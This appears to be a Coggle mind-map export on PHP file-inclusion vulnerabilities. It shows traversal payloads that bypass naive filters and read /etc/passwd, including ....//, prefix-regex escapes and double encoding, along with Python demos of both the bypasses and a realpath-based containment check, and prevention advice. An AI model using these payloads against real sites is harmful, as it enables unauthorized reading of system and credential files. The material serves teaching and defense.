File inclusion (LFI, RFI) - Coggle Diagram
LFI Bypass Techniques
Path traversal filters
The PHP filter: $language = str_replace('../', '', $_GET['language']);
str_replace makes a single, non-recursive pass. A plain ../../etc/passwd is reduced to etc/passwd, but ....// loses only its inner ../ and collapses to ../, so ....//....//....//....//etc/passwd reaches include() as ../../../../etc/passwd.
Approved paths
Example regex: if(preg_match('/^.\/languages\/.+$/', $_GET['language'])) {
The pattern only fixes the prefix (and the first . is an unescaped wildcard); .+ accepts any suffix. Supplying the approved prefix and then traversing out of it, e.g. ./languages/../../../../etc/passwd, satisfies the check.
Double encoding
The traversal ../../../../etc/passwd URL-encoded once becomes %2e%2e%2f...; encoding the % itself a second time (%25) gives the payload below (the letters of etc and passwd are encoded only once). The server decodes the query string once, so the filter sees a value that still contains no ../; the traversal only appears if the value is decoded a second time before the include.
Double encoded : %252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%65%74%63%252f%70%61%73%73%77%64
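The three bypasses above side by side, as an added example that is not part of the original diagram. The two PHP checks are re-implemented in Python so they can be run offline (Python's str.replace is, like str_replace, a single non-recursive pass, and re.match mirrors the preg_match pattern); the decode_once step stands in for the web server's query-string decoding. The function names and payloads are constructed for the demonstration.

```python
import re
from urllib.parse import unquote

# Added illustration: Python re-implementations of the two PHP filters from the
# diagram plus a single URL-decode standing in for the server's query-string
# decoding. All payloads below are constructed test inputs.

DOUBLE_ENCODED = ('%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f'
                  '%65%74%63%252f%70%61%73%73%77%64')


def strip_dotdot_filter(language: str) -> str:
    """Mirror of: $language = str_replace('../', '', $_GET['language']);
    One non-recursive pass: every '../' is removed, but the characters left
    around a removed match can themselves form a new '../'."""
    return language.replace('../', '')


def approved_path_filter(language: str) -> bool:
    r"""Mirror of: preg_match('/^.\/languages\/.+$/', $_GET['language'])
    Only the prefix is constrained (the first '.' is an unescaped wildcard);
    '.+' accepts an arbitrary suffix, including a traversal."""
    return re.match(r'^./languages/.+$', language) is not None


def decode_once(value: str) -> str:
    """The server decodes the query string exactly once before the filter
    runs; a doubly-encoded value reaches the filter still single-encoded and
    only becomes '../' if something decodes it a second time."""
    return unquote(value)


def bypass_str_replace() -> str:
    """'....//' loses its inner '../' and collapses to '../'."""
    return strip_dotdot_filter('....//....//....//....//etc/passwd')


def bypass_approved_path() -> bool:
    """Satisfy the required prefix, then traverse out of it."""
    return approved_path_filter('./languages/../../../../etc/passwd')


def bypass_double_encoding() -> tuple:
    """Return (what the filter sees after one decode,
               what include() resolves after a second decode)."""
    seen_by_filter = decode_once(DOUBLE_ENCODED)
    final_path = decode_once(seen_by_filter)
    return seen_by_filter, final_path


if __name__ == '__main__':
    print('filter on ../../etc/passwd  ->', strip_dotdot_filter('../../etc/passwd'))
    print('str_replace bypass          ->', bypass_str_replace())
    print('approved-path bypass passes ->', bypass_approved_path())
    seen, final = bypass_double_encoding()
    print('filter sees                 ->', seen)
    print('after second decode         ->', final)
```

Running the block prints the filtered value for each payload; the first line shows that the naive filter does stop a plain ../ sequence, which is exactly why the three payloads are shaped the way they are.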
Prevention methods
- Path Traversal Prevention
Using Realpath: Resolve the requested path with realpath() (which collapses .. components and follows symlinks) and compare the result against the canonical base directory, not against the raw input; reject anything that does not resolve to a regular file under that directory.
Chroot Jail: Limit the application to a specific directory with a chroot jail so that even a successful traversal has nothing outside it to read. A chroot confines the process's view of the filesystem; it is not a privilege boundary for a process running as root.
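A realpath-based containment check, added here as an example and not code from the original diagram. It is written in Python (os.path.realpath plays the role of PHP's realpath()), builds a throwaway directory as constructed sample input, and is fed the payloads from the bypass list above: plain traversal, the ....// trick, a still-percent-encoded value, an absolute path, and a symlink planted inside the allowed directory. The names safe_include_path, build_demo_tree and evaluate are this example's own.

```python
import os
import tempfile
from typing import Optional

# Added illustration: resolve the requested file with realpath() and accept it
# only if the resolved, symlink-free path is a regular file inside the allowed
# directory. The directory tree below is constructed for the demo.


def safe_include_path(base_dir: str, user_value: str) -> Optional[str]:
    """Return the absolute path to include, or None if the request escapes
    base_dir. os.path.realpath() resolves '..' and symlinks like PHP's
    realpath(); unlike PHP it does not return false for missing files, so
    the isfile() check is what rejects paths that do not exist."""
    base = os.path.realpath(base_dir)
    # os.path.join discards `base` when user_value is absolute; realpath then
    # yields a path outside `base`, which the prefix test below rejects.
    candidate = os.path.realpath(os.path.join(base, user_value))
    if not candidate.startswith(base + os.sep):
        return None
    if not os.path.isfile(candidate):
        return None
    return candidate


def build_demo_tree() -> str:
    """Create <tmp>/languages/en.php plus a symlink inside the directory that
    points outside it (constructed fixture; if the platform refuses to create
    the symlink the entry simply does not exist, which is also rejected)."""
    root = tempfile.mkdtemp(prefix='lfi_demo_')
    lang_dir = os.path.join(root, 'languages')
    os.mkdir(lang_dir)
    with open(os.path.join(lang_dir, 'en.php'), 'w') as fh:
        fh.write('<?php echo "hello"; ?>\n')
    try:
        os.symlink('/etc/passwd', os.path.join(lang_dir, 'evil.php'))
    except (OSError, NotImplementedError):
        pass
    return lang_dir


PAYLOADS = [
    'en.php',                                            # legitimate
    '../../../../etc/passwd',                            # plain traversal
    '....//....//....//....//etc/passwd',                # str_replace bypass
    '%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd',  # not decoded again
    '/etc/passwd',                                       # absolute path
    'evil.php',                                          # symlink leaving base
]


def evaluate(base_dir: str) -> dict:
    """Map each constructed payload to the decision of safe_include_path()."""
    return {p: safe_include_path(base_dir, p) for p in PAYLOADS}


if __name__ == '__main__':
    base = build_demo_tree()
    for payload, decision in evaluate(base).items():
        verdict = 'ALLOW ' + decision if decision else 'REJECT'
        print(f'{payload!r:55} -> {verdict}')
```

The check deliberately compares against base + os.sep rather than base alone, so a sibling directory such as languages2 cannot pass as a prefix match; the symlink case shows why the comparison has to run on the resolved path and not on the string the user supplied.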
- File Inclusion Restrictions
Restrict External Sources: Prevent including files from external sources; in particular, never allow URL-based file inclusions. In PHP, remote file inclusion requires allow_url_include to be On (it is Off by default); keep it Off, and keep allow_url_fopen Off where the application does not need URL streams.
- File Permissions and Security
File Permissions: Run the web server and PHP process as a low-privilege user and grant it, with chmod, only the minimum permissions it needs, so that even a successful inclusion can read nothing the process was not already entitled to.
File Ownership: Check file ownership and group ownership, and ensure that only authorized users and the web server account have access to the application's files.
- Code Review and Security Testing
Penetration Testing: Conduct regular penetration tests to identify and fix file inclusion vulnerabilities.
- Firewalls and WAF (Web Application Firewall)